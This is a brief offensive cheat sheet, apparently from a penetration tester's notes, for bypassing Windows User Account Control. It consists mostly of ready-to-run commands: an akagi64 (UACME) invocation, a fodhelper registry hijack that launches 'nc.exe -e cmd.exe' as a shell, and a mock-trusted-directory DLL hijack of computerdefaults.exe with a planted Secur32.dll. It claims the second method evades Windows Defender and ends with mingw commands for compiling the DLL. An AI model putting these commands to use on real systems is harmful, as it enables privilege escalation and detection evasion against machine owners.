UAC Bypass


Akagi-UACME will %99 be a win here

akagi64 61 c:\windows\system32\cmd.exe

Technique 1

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'c:\users\morph3\nc.exe -e cmd.exe 443' -Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

Now simply type "fodhelper" and you should have the shell.

To undo this,

Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

Technique 2

This technique is pretty solid and does not get detected by the windows defender

TLDR; you can fool windows by creating a folder called c:\windows \System32\ you can put a windows binary(auto elevated ones) there and hijack dlls. There is a full list of hijackable binaries here,

mkdir "C:\Windows \"
mkdir "C:\Windows \System32\"
copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe"
copy ".\morph.dll" "C:\Windows \System32\Secur32.dll"
"C:\Windows \System32\computerdefaults.exe"
  • You might need to compile your binary in 64bit arch

# x64
x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp

# x86
i686-w64-mingw32-gcc -shared -o test-x86.dll test.cpp

Last updated